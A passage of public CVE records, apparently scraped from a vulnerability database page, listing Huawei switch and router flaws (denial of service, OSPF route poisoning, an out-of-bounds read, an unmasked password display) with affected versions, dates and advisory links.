               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2016-03-30T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei Quidway S9700, S5700, S5300, S9300, and S7700 switches with software before V200R003SPH012 allow remote attackers to cause a denial of service (switch restart) via crafted traffic.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2016-04-11T14:57:02",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2016-3678",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei Quidway S9700, S5700, S5300, S9300, and S7700 switches with software before V200R003SPH012 allow remote attackers to cause a denial of service (switch restart) via crafted traffic.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2016-3678",
      datePublished: "2016-04-11T15:00:00",
      dateReserved: "2016-03-28T00:00:00",
      dateUpdated: "2024-08-06T00:03:34.462Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2017-8147 (GCVE-0-2017-8147)
Vulnerability from cvelistv5
Published
2017-11-22 19:00
Modified
2024-09-16 17:03
Severity ?
Summary
AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050 have a MaxAge LSA vulnerability due to improper OSPF implementation. When the device receives special LSA packets, the LS (Link Status) age would be set to MaxAge, 3600 seconds. An attacker can exploit this vulnerability to poison the route table and launch a DoS attack.
Impacted products
Vendor Product Version
Huawei Technologies Co., Ltd. AC6005,AC6605,AR1200,AR200,AR3200,CloudEngine 12800,CloudEngine 5800,CloudEngine 6800,CloudEngine 7800,CloudEngine 8800,E600,S12700,S1700,S2300,S2700,S5300,S5700,S6300,S6700,S7700,S9300,S9700,Secospace USG6600, Version: AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005 ...[truncated*]
Create a notification for this product.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-05T16:27:22.909Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "AC6005,AC6605,AR1200,AR200,AR3200,CloudEngine 12800,CloudEngine 5800,CloudEngine 6800,CloudEngine 7800,CloudEngine 8800,E600,S12700,S1700,S2300,S2700,S5300,S5700,S6300,S6700,S7700,S9300,S9700,Secospace USG6600,",
               vendor: "Huawei Technologies Co., Ltd.",
               versions: [
                  {
                     status: "affected",
                     version: "AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005 ...[truncated*]",
                  },
               ],
            },
         ],
         datePublic: "2017-11-15T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050 have a MaxAge LSA vulnerability due to improper OSPF implementation. When the device receives special LSA packets, the LS (Link Status) age would be set to MaxAge, 3600 seconds. An attacker can exploit this vulnerability to poison the route table and launch a DoS attack.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "MaxAge LSA",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-11-22T18:57:01",
            orgId: "25ac1063-e409-4190-8079-24548c77ea2e",
            shortName: "huawei",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
            },
         ],
         x_ConverterErrors: {
            version_name: {
               error: "version_name too long. Use array of versions to record more than one version.",
               message: "Truncated!",
            },
         },
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@huawei.com",
               DATE_PUBLIC: "2017-11-15T00:00:00",
               ID: "CVE-2017-8147",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "AC6005,AC6605,AR1200,AR200,AR3200,CloudEngine 12800,CloudEngine 5800,CloudEngine 6800,CloudEngine 7800,CloudEngine 8800,E600,S12700,S1700,S2300,S2700,S5300,S5700,S6300,S6700,S7700,S9300,S9700,Secospace USG6600,",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Huawei Technologies Co., Ltd.",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050 have a MaxAge LSA vulnerability due to improper OSPF implementation. When the device receives special LSA packets, the LS (Link Status) age would be set to MaxAge, 3600 seconds. An attacker can exploit this vulnerability to poison the route table and launch a DoS attack.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "MaxAge LSA",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "25ac1063-e409-4190-8079-24548c77ea2e",
      assignerShortName: "huawei",
      cveId: "CVE-2017-8147",
      datePublished: "2017-11-22T19:00:00Z",
      dateReserved: "2017-04-25T00:00:00",
      dateUpdated: "2024-09-16T17:03:05.616Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2016-6518 (GCVE-0-2016-6518)
Vulnerability from cvelistv5
Published
2016-09-26 15:00
Modified
2024-08-06 01:29
Severity ?
Summary
Memory leak in Huawei S9300, S5300, S5700, S6700, S7700, S9700, and S12700 devices allows remote attackers to cause a denial of service (memory consumption and restart) via a large number of malformed packets.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T01:29:20.323Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "92968",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/92968",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2016-09-14T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Memory leak in Huawei S9300, S5300, S5700, S6700, S7700, S9700, and S12700 devices allows remote attackers to cause a denial of service (memory consumption and restart) via a large number of malformed packets.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2016-09-26T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "92968",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/92968",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2016-6518",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Memory leak in Huawei S9300, S5300, S5700, S6700, S7700, S9700, and S12700 devices allows remote attackers to cause a denial of service (memory consumption and restart) via a large number of malformed packets.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "92968",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/92968",
                  },
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2016-6518",
      datePublished: "2016-09-26T15:00:00",
      dateReserved: "2016-08-02T00:00:00",
      dateUpdated: "2024-08-06T01:29:20.323Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2015-8675 (GCVE-0-2015-8675)
Vulnerability from cvelistv5
Published
2016-01-15 19:00
Modified
2024-08-06 08:29
Severity ?
Summary
Huawei S5300 Campus Series switches with software before V200R005SPH008 do not mask the password when uploading files, which allows physically proximate attackers to obtain sensitive password information by reading the display.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T08:29:20.186Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2016-01-13T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Huawei S5300 Campus Series switches with software before V200R005SPH008 do not mask the password when uploading files, which allows physically proximate attackers to obtain sensitive password information by reading the display.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2016-01-15T19:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2015-8675",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Huawei S5300 Campus Series switches with software before V200R005SPH008 do not mask the password when uploading files, which allows physically proximate attackers to obtain sensitive password information by reading the display.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
                     refsource: "CONFIRM",
                     url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2015-8675",
      datePublished: "2016-01-15T19:00:00",
      dateReserved: "2015-12-25T00:00:00",
      dateUpdated: "2024-08-06T08:29:20.186Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

CVE-2017-17165 (GCVE-0-2017-17165)
Vulnerability from cvelistv5
Published
2018-02-15 16:00
Modified
2024-08-05 20:43
Severity ?
Summary
IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset.
Impacted products
Vendor Product Version
Huawei Technologies Co., Ltd. Quidway S2700,Quidway S5300,Quidway S5700,S2300,S2700,S5300,S5700,S600-E,S6300,S6700 Version: Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00
Create a notification for this product.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-05T20:43:59.818Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171213-02-ipv6-en",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "Quidway S2700,Quidway S5300,Quidway S5700,S2300,S2700,S5300,S5700,S600-E,S6300,S6700",
               vendor: "Huawei Technologies Co., Ltd.",
               versions: [
                  {
                     status: "affected",
                     version: "Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00",
                  },
               ],
            },
         ],
         datePublic: "2017-12-13T00:00:00",
         descriptions: [
            {
               lang: "en",
